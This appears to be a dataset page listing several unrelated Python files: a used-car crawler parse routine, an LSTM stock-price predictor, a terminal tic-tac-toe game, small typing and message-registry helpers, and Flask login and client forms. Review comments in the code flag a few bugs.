    caritem['img_url'] = img_nodes.extract_first() if img_nodes else "-"
    return caritem
#car parse control
def parse(item):
    """Parse one crawled haoche51 item end-to-end and persist the result.

    item: crawler dict; 'datasave'[1] holds the raw page HTML.
    Runs every parse_* helper over the page, merges their dicts into one
    row, batches it via savecar(), then flushes and closes connections.
    Returns the string "One group finish".
    """
    #-*- coding: UTF-8 -*-
    # accumulator for rows produced in this run
    caritems=[]
    # per-process parameters and storage handles from the shared init helpers
    params = Init()
    processparamlist =ParseprocessInit(params)
    website= processparamlist[0]
    carinfocreate=processparamlist[1]
    counts=processparamlist[2]
    savesize=processparamlist[3]
    mysqltable=processparamlist[4]
    # connection=processparamlist[5]
    # collection=processparamlist[6]
    mysqldb=processparamlist[7]
    mysqldbc=processparamlist[8]
    # df=processparamlist[9]
    #
    # (historical mongo-driven batch loop, kept for reference)
    # for i in collection.find().skip(start).limit(step):
    # returndf=bloom_check(i['status'],df)
    # if not returndf:
    # try:
    try:
        # counts +=1
        # print counts
        # logging.log(msg="counts:"+str(counts)+','+i['url'], level=logging.INFO)
        # parse original:1 — bookkeeping fields from the item itself
        caritem = parse_original(item)
        # parse keyinfo:2 — build the DOM once, reuse for every helper
        content = item['datasave'][1]
        dom = scrapy.selector.Selector(text=content)
        caritem = dict(caritem, **parse_keyinfo(dom))
        # parse baseinfo:3
        caritem = dict(caritem, **parse_baseinfo(dom))
        # parse certification:4
        caritem = dict(caritem, **parse_certification(dom))
        # parse dealor:5
        caritem = dict(caritem, **parse_dealor(dom))
        # parse createinfo:6 — column-name map (and optional mapping table)
        carinfors_name = parse_createinfo(carinfocreate,website,mysqldb)
        # parse carinfo:7
        caritem = dict(caritem, **parse_carinfo1(dom))
        caritem = dict(caritem, **parse_carinfo2(dom,carinfors_name))
        caritem = dict(caritem, **parse_otherinfo(dom))
        # parse checkpoints:8
        caritem = dict(caritem, **parse_checkpoints(dom))
        # parse desc:9
        caritem = dict(caritem, **parse_desc(dom))
        # add the finished row and flush when the batch is full
        caritems.append(caritem)
        caritems=savecar(caritems,mysqltable,mysqldb,savesize)
        # (historical per-item error bookkeeping, kept for reference)
        # except:
        # try:
        # #save exception
        # print str(counts)+":" + i["url"]+", parse error."
        # # logging.log(msg="counts:" + str(counts) + ',' + i['url']+", parse error.", level=logging.ERROR)
        # saveerror(counts,i['url'],website,mysqldb)
        # continue
        # except:
        # pass
        # else:
        # print "item duplicated!"
        # logging.log(msg="counts:" + str(counts) + ',' + i['url'] + ", item duplicated!", level=logging.WARNING)
    except:
        # NOTE(review): bare except silently drops every parse failure for
        # this item (including programming errors) — consider at least
        # logging the url before continuing.
        pass
    # final flush of any rows still in the batch, then close connections
    savecarfinal(caritems,mysqltable,mysqldb,savesize)
    conclose(mysqldb,mysqldbc)
    # logging.log(msg="counts:" + str(counts) + ',' + ", One group finish!", level=logging.INFO)
    return "One group finish"
# parse(0,200)
#ppexcut(8)
|
import inspect
try:
    from typing import GenericMeta  # python 3.6
except ImportError:
    # GenericMeta was removed in 3.7; a dummy metaclass keeps the
    # isinstance() check below valid (it is simply always False).
    class GenericMeta(type):
        pass


def annotation_to_string(annotation):
    """Render a signature annotation compactly, dropping the 'typing.' prefix."""
    if annotation is inspect.Signature.empty:
        return ""
    plain_class = inspect.isclass(annotation) and not isinstance(annotation, GenericMeta)
    if plain_class:
        return annotation.__name__
    return str(annotation).replace("typing.", "")
|
# Recurrent Neural Network
# Part 1 - Data Preprocessing

# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd

# Importing the training set
fore_step = 3            # predict the price fore_step rows ahead
time_step = 60           # look-back window length
train_samples = 1144     # rows consumed from the training CSV
test_samples = 20        # rows in the test CSV
feature_size = 2         # two features per timestep: price and volume
volume_downsize = 10000  # shrink raw volume before normalising
dataset_train = pd.read_csv('Google_Stock_Price_Train.csv')
training_set = dataset_train.iloc[:, 1:2].values  # 'Open' price column (see dataset_total below)
volume_set = dataset_train.iloc[:, 5:6].values    # 'Volume' column (see volume_total below)
volume_set = volume_set / volume_downsize
#epochs = 180
#batch_size = 32

# Feature Scaling
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler(feature_range = (0, 1))
training_set_scaled = sc.fit_transform(training_set)
# NOTE(review): this second fit_transform REFITS the same scaler on volume,
# overwriting the price fit; sc.transform()/sc.inverse_transform() in Part 3
# therefore apply the volume scaling to prices — likely a bug; a dedicated
# scaler per feature would fix it (needs a coordinated change in Part 3).
volume_set_scaled = sc.fit_transform(volume_set)

# Creating a data structure with 60 timesteps and 1 output
V_train = []
X_train = []
y_train = []
#for i in range(60, samples):
#try two day ahead so it's 60~1256, shift two row
for i in range(time_step, train_samples-fore_step):
    X_train.append(training_set_scaled[i-time_step:i, 0])
    V_train.append(volume_set_scaled[i-time_step:i, 0])
    y_train.append(training_set_scaled[i+fore_step, 0])
y_train = np.array(y_train)
#X_train = np.array(X_train)
#V_train = np.array(V_train)
# interleave the price and volume windows: [p0, v0, p1, v1, ...]
mer_train = [None]*(len(X_train)+len(V_train))
mer_train[::2] = X_train
mer_train[1::2] = V_train
X_train = np.array(mer_train)

# Reshaping to (samples, time_step, feature_size) as the LSTM expects
#X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
X_train = np.reshape(X_train, (train_samples-time_step-fore_step, time_step, feature_size))
# Part 2 - Building the RNN

# Importing the Keras libraries and packages
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
from keras.models import load_model
from pathlib import Path
#import os
##os.path.isfile('regressor.h5')
# Reuse the previously trained model when a checkpoint exists on disk,
# otherwise build and train it from scratch and save the checkpoint.
my_file = Path("regressor.h5")
if my_file.is_file():
    # returns a compiled model
    # identical to the previous one
    regressor = load_model('regressor.h5')
else:
    # Initialising the RNN
    regressor = Sequential()
    # Adding the first LSTM layer and some Dropout regularisation
    regressor.add(LSTM(units = 50, return_sequences = True,
                       input_shape = (X_train.shape[1], feature_size)))
    regressor.add(Dropout(0.2))
    # Adding a second LSTM layer and some Dropout regularisation
    regressor.add(LSTM(units = 50, return_sequences = True))
    regressor.add(Dropout(0.2))
    # Adding a third LSTM layer and some Dropout regularisation
    regressor.add(LSTM(units = 50, return_sequences = True))
    regressor.add(Dropout(0.2))
    # Adding a fourth LSTM layer and some Dropout regularisation
    # (last layer: no return_sequences, feeds the Dense head)
    regressor.add(LSTM(units = 50))
    regressor.add(Dropout(0.2))
    # Adding the output layer (single scaled-price prediction)
    regressor.add(Dense(units = 1))
    # Compiling the RNN
    regressor.compile(optimizer = 'adam', loss = 'mean_squared_error')
    # Fitting the RNN to the Training set
    regressor.fit(X_train, y_train, epochs=180, batch_size=32)
    regressor.save('regressor.h5') # creates a HDF5 file 'my_model.h5'
#del model # deletes the existing model
# Part 3 - Making the predictions and visualising the results

# Getting the real stock price of 2017
dataset_test = pd.read_csv('Google_Stock_Price_Test.csv')
real_stock_price = dataset_test.iloc[:, 1:2].values

# Getting the predicted stock price of 2017
# Build the test windows from the tail of train data + the test data so the
# first test sample still has a full time_step history.
volume_total = pd.concat((dataset_train['Volume'], dataset_test['Volume']), axis = 0)
dataset_total = pd.concat((dataset_train['Open'], dataset_test['Open']), axis = 0)
volume_inputs = volume_total[len(volume_total) - len(dataset_test) - time_step :].values
volume_inputs = volume_inputs / volume_downsize
volume_inputs = volume_inputs.reshape(-1,1)
# NOTE(review): `sc` was last fitted on volume in Part 1, so the price
# transform/inverse_transform below uses the volume scaling — see the note
# in Part 1; fix both parts together.
volume_inputs = sc.transform(volume_inputs)
inputs = dataset_total[len(dataset_total) - len(dataset_test) - time_step :].values
inputs = inputs.reshape(-1,1)
inputs = sc.transform(inputs)
V_test = []
X_test = []
for i in range(time_step, time_step+test_samples):
    V_test.append(volume_inputs[i-time_step:i, 0])
    X_test.append(inputs[i-time_step:i, 0])
# interleave price and volume windows, same layout as training
mer_train = [None]*(len(X_test)+len(V_test))
mer_train[::2] = X_test
mer_train[1::2] = V_test
X_test = np.array(mer_train)
#X_test = np.array(X_test)
#X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
print(X_test.shape[0])
X_test = np.reshape(X_test, (test_samples, time_step, feature_size))
#output 3 day ahead
predicted_stock_price = regressor.predict(X_test)
#want to extract the first 2 rows and first 3 columns A_NEW = A[0:2,0:3]
# NOTE(review): filler_test is computed but unused since the vstack below is
# commented out; dead code kept for reference.
filler_test = predicted_stock_price[0:3, :]
#filler_test = np.reshape(filler_test, (fore_step,1))
#predicted_stock_price = np.vstack((filler_test, predicted_stock_price))
#print(type(predicted_stock_price)) #'numpy.ndarray'
predicted_stock_price = sc.inverse_transform(predicted_stock_price)
#print(predicted_stock_price.shape) #(20,1)

# Visualising the results
plt.grid(linestyle='--', color='black')
#plt.grid(color='gray', linestyle='dashed', linewidth='0.5')
plt.plot(real_stock_price, color = 'red', label = 'Real Google Stock Price')
plt.plot(predicted_stock_price, color = 'blue', label = 'Predicted Google Stock Price')
plt.title('Google Stock Price Prediction')
plt.xlabel('Time')
plt.ylabel('Google Stock Price')
plt.legend()
plt.show()
|
# relative
from .abstract_node_msg_registry import AbstractNodeMessageRegistry
class DomainMessageRegistry(AbstractNodeMessageRegistry):
    """Registry of messages that can be used by the domain service.

    Adds no behavior of its own; everything is inherited from
    AbstractNodeMessageRegistry — this subclass exists so the domain
    service has its own registry type.
    """
|
from txt_game.tic_tac_toe.statistics import read_statistics, save_statistics, gen_game_stats
from txt_game.tic_tac_toe.comp import make_move as comp_move
from txt_game.tic_tac_toe.settings import modes
from txt_game.rendering import rend_board, clr
import random as rnd
def run_game(settings, mode):
    """
    Start tic tac toe game.
    Use setting and mode. Save game statistics in JSON file.

    settings: dict with keys 'Player 1', 'Player 2', 'Level', 'Who first'
    (as read by def_who_first and the prompt below).
    mode: key into the `modes` table ('1' = vs computer, '2' = two players).
    Returns early (without saving stats) if the player backs out at the
    confirmation prompt.
    """
    statistics = read_statistics()
    board = [' ' for _ in range(9)]  # 9 cells, ' ' = empty
    clr()
    # confirmation screen: any non-empty input aborts back to the menu
    value = input(f'Game settings:\n'
                  f'\tMode:\t{modes[mode]}\n'
                  f'\tPlayer 1 nick:\t{settings["Player 1"]}\n'
                  f'\tPlayer 2 nick:\t{settings["Player 2"]}\n'
                  f'\tLevel:\t{settings["Level"]}\n'
                  f'For starting press Enter,\n'
                  f'else input someone that back in menu and change setting.')
    if value:  # if value then return to menu
        return
    game_stats = gen_game_stats(settings, mode)  # dict for accumulate statistics for this game
    game_stats['First'] = def_who_first(settings, mode)  # define beginner
    clr(rend_board(board))  # clear terminal and show empty board
    moves = 0  # counter for moves
    active_player = game_stats['First']  # active player -> beginner
    inactive_player = def_inactive_player(active_player, mode)  # inactive player -> second player (according mode)
    while True:  # One cycle per move
        # Make a move
        if active_player == 'Comp':
            cell = comp_move(board, game_stats['Level'])  # comp select cell
        else:
            cell = player_move(board, active_player, game_stats[active_player])  # player input selected cell
        # Define char for filling cell
        if active_player == game_stats['First']:
            board[cell] = 'X'  # beginner moved by X
        else:
            board[cell] = 'O'
        moves += 1
        clr(rend_board(board))  # upd board after moving
        if check_win(board):
            # record the win and append this game to the history
            game_stats['Winner'] = active_player
            game_stats['Moves'] = moves
            clr(rend_board(board))
            print(f'Win {active_player}: {game_stats[active_player]}!')
            if 'Games' not in statistics:
                statistics['Games'] = []
            statistics['Games'].append(game_stats)
            input('Press Enter then return in menu')
            break
        if moves >= 9:
            # board full with no winner: draw
            game_stats['Moves'] = moves
            clr(rend_board(board))
            print(f'DRAW!')
            if 'Games' not in statistics:
                statistics['Games'] = []
            statistics['Games'].append(game_stats)
            input('Press Enter then return in menu')
            break
        active_player, inactive_player = inactive_player, active_player  # swap players
    save_statistics(statistics)
def check_win(b):
    """
    Check win's combinations.

    b: list of 9 one-char cells (' ' = empty).
    Returns True when any row, column or diagonal holds three identical
    non-empty marks, otherwise False (the original implicitly returned
    None on no win; callers only test truthiness, so False is compatible).
    """
    lines = (
        (0, 1, 2), (3, 4, 5), (6, 7, 8),  # horizontal lines
        (0, 3, 6), (1, 4, 7), (2, 5, 8),  # vertical lines
        (0, 4, 8), (2, 4, 6),             # diagonals
    )
    return any(b[i] != ' ' and b[i] == b[j] == b[k] for i, j, k in lines)
def player_move(board, player, nick):
    """
    Allow input selected cell by player.

    Prompts until the player enters the index (0-8) of an empty cell and
    returns that index.  Re-prompts (via recursion) on any invalid pick.
    """
    try:
        cell = int(input(f'{player}: Choose empty cell, {nick}: -->'))
    except ValueError:
        # BUG FIX: the original bare `except:` also swallowed EOFError and
        # KeyboardInterrupt, trapping the player in an unbreakable loop;
        # only non-numeric input should count as an invalid pick.
        cell = -1
    if cell in [i for i, char in enumerate(board) if char == ' ']:
        return cell
    else:
        print('The cell must be empty. Choose another cell.')
        return player_move(board, player, nick)
def def_inactive_player(active_player, mode):
    """
    Define inactive player.

    The opponent of 'Comp' or 'Player 2' is always 'Player 1'; otherwise
    the opponent depends on the mode ('1' -> 'Comp', '2' -> 'Player 2').
    """
    if active_player in ('Comp', 'Player 2'):
        return 'Player 1'
    return {'1': 'Comp', '2': 'Player 2'}.get(mode)
def def_who_first(settings, mode):
    """
    Define beginner according settings.

    Mode '2' (two players): pick randomly.  Mode '1' (vs computer): honour
    settings['Who first'] — 'Random' picks randomly, 'Player' starts the
    human, anything else starts the computer.
    """
    if mode == '2':
        return rnd.choice(['Player 1', 'Player 2'])
    if mode == '1':
        preference = settings['Who first']
        if preference == 'Random':
            return rnd.choice(['Player 1', 'Comp'])
        return 'Player 1' if preference == 'Player' else 'Comp'
def def_mode():
    """
    Allow choose game mode.

    Prompts until the user enters '1', '2' or '3' and returns the choice.
    """
    mode = input('Hello, choose mode: 1 - Comp VS Player; 2 - Player 1 VS Player 2; 3 - Comp 1 VS Comp 2;\n-->')
    # BUG FIX: the original test `mode in '123'` accepted the empty string
    # (every string contains ''), so just pressing Enter returned '' as a
    # valid mode; membership in a tuple checks whole values only.
    if mode in ('1', '2', '3'):
        return mode
    else:
        print(f'Incorrect mode: {mode}. Please, choose again.')
        return def_mode()  # Use recursion while correct input
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired
class ClientForm(FlaskForm):
    """Client create/edit form: first and last name, both required."""
    # Labels are Polish: 'imie' = first name, 'nazwisko' = last name
    first_name = StringField('imie', validators=[DataRequired()])
    last_name = StringField('nazwisko', validators=[DataRequired()])
class LoginForm(FlaskForm):
    """Login form: required login and password ('Has\u0142o' is Polish for password)."""
    login = StringField('Login', validators=[DataRequired()])
    password = PasswordField('Hasło', validators=[DataRequired()])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.